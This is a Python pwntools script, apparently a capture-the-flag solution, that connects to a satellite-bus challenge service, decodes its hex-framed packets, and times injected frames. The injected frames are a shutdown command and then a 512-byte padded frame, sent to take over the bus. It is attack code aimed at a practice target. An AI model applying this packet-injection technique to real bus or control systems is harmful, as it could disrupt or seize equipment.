#!/usr/bin/env python3
import time
import sys
from pwnlib import tubes
# Ticket the service prompts for right after connecting ("Ticket please:");
# the value committed here is a placeholder, not a usable ticket.
TICKET = "THE_TICKET"
# Open the connection and answer the ticket prompt.
# The ticket line is sent before the prompt is read; after a short pause the
# prompt itself is consumed (and dropped) so the packet loop below starts on
# clean input.
r = tubes.remote.remote('bus.satellitesabove.me', 5041)
r.send('{}\n'.format(TICKET))
time.sleep(0.5)
r.recvuntil('Ticket please:\n', drop=True)
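def to_hex(b):
    """Render a byte sequence as colon-separated hex digits.

    Each byte goes through ``hex()`` and is therefore NOT zero-padded
    (``b'\\x01\\x0a'`` -> ``'1:a'``); the colon separators keep the result
    unambiguous. Returns ``''`` for an empty input.
    """
    return ':'.join(hex(x)[2:] for x in b)


# The fixed-offset decoder below reads up to b[30], so a packet must hold at
# least this many bytes before it can be field-decoded.
_FIELD_PKT_LEN = 31


def _print_fields(b):
    """Print the fixed-offset fields of a ``:``-framed packet of >= 31 bytes.

    Offsets are taken verbatim from the original decoder: b[7:13], b[13],
    b[15:22], b[22] (expected '@'), b[23:25], b[25], b[27:30], b[30]
    (expected '?'). Bytes 1..6, 14 and 26 are not used. The header of the
    summary line is printed as a constant, not taken from b[1:4].
    """
    field1 = to_hex(b[7:13])  # 6 bytes
    field1end = chr(b[13])
    field2 = to_hex(b[15:22])  # 7 bytes; b[14] is skipped
    if b[22] != ord('@'):
        print('b[22] should be @ but is {}'.format(chr(b[22])))
    field3 = to_hex(b[23:25])  # 2 bytes
    field3end = chr(b[25])
    # b[26] was read into an unused local in the original; it is not decoded
    field4 = to_hex(b[27:30])  # 3 bytes
    if b[30] != ord('?'):
        print('b[30] is not ?')
    print(': 00:00:00 > {} {} {} @ {} {} {} ?'.format(field1, field1end, field2,
                                                     field3, field3end, field4))


def decode_pkt(b):
    """Pretty-print one hex-decoded bus packet to stdout.

    Dispatches on the first byte:
      * ``0xCA``  -- passed through silently (format not known here);
      * ``':'``   -- if byte 3 is '>' or '?', the fixed-offset fields are
                     printed via ``_print_fields``; packets too short for
                     that layout are reported instead of raising IndexError;
      * ``';'``   -- reported as a delimiter;
      * anything else -- the lead byte and "unknown data" are printed.
    A blank line (``print('\\n')``) follows every non-empty packet.

    Args:
        b: packet payload as ``bytes`` (already hex-decoded).

    Returns:
        None; all output goes to stdout.
    """
    if not b:
        return
    lead = b[0]
    if lead == 0xCA:
        pass  # raw data?
    elif lead == ord(':'):
        # Guard both the byte-3 probe and the field offsets; the original
        # indexed unconditionally and a short packet aborted the client loop.
        if len(b) >= 4 and b[3] in (ord('>'), ord('?')):
            if len(b) < _FIELD_PKT_LEN:
                print('short packet ({} bytes): {}'.format(len(b), to_hex(b)))
            else:
                _print_fields(b)
    elif lead == ord(';'):
        print('delimiter')  # end of previous packet?
    else:
        print(lead)
        print('unknown data')
    print('\n')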
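# Main receive loop. Frames on the wire are ASCII: a '^', then '+'-separated
# hex byte pairs, then a '.' terminator; each frame is hex-decoded into `h`
# and classified by its leading bytes.
start = True       # True while waiting for the START half of a ':\x00\x00>' pair
inj = b"^3b+00+00+37+."
inj2 = b"^ca+" + (b"00+" * 512) + b"."

dont = False       # set per packet when it must not be handed to decode_pkt
inj2_b = False     # becomes True once a reply echoing the `inj` bytes is seen
print("Injection: " + inj.decode("utf-8"))
while True:
    r.recvuntil('^')
    raw = r.recvuntil('.')
    rawn = b'^' + raw  # re-attach the consumed frame start for the log line
    print(rawn)
    fields = raw.decode().split('+')
    del fields[-1]  # drop the trailing '.' terminator
    # Any non-hex field raises ValueError and ends the loop, as in the
    # original; the service is expected to keep to the framing above.
    h = bytes([int(i, 16) for i in fields])
    if h == b';\x00\x00?':
        print("ONCE CALL")
    elif h == b';\x00\x00>':
        print("END CALL")
    elif h.startswith(b':\x00\x00?'):
        print(f"ONCE: {h[4:].hex()}")
    elif h.startswith(b'\x3b\x00\x00\x37'):
        # Reply carrying the same four bytes that `inj` encodes.
        print("SHUT DOWN SUCCESSFUL")
        dont = True
        inj2_b = True
        print("INJECTING AGAIN")
        r.send(inj2)
    elif h.startswith(b':\x00\x00>'):
        # notable delay between start and end each time
        if start:
            print(f"START: {h[4:].hex()}")
            start = False
        else:
            # Second packet of the pair: send `inj` until the shutdown reply
            # has been seen, `inj2` afterwards.
            if not inj2_b:
                print("INJECTING")
                r.send(inj)
            else:
                print("INJECTING AGAIN")
                r.send(inj2)
            print(f"END: {h[4:].hex()}")
            start = True
    elif h.startswith(b'\xca'):
        print(f"JUICE: {h}")
    else:
        dont = True
        print(f"???: {h.hex()}")
    if not dont:
        decode_pkt(h)
    dont = False
    sys.stdout.flush()  # keep the log ordered when stdout is a pipe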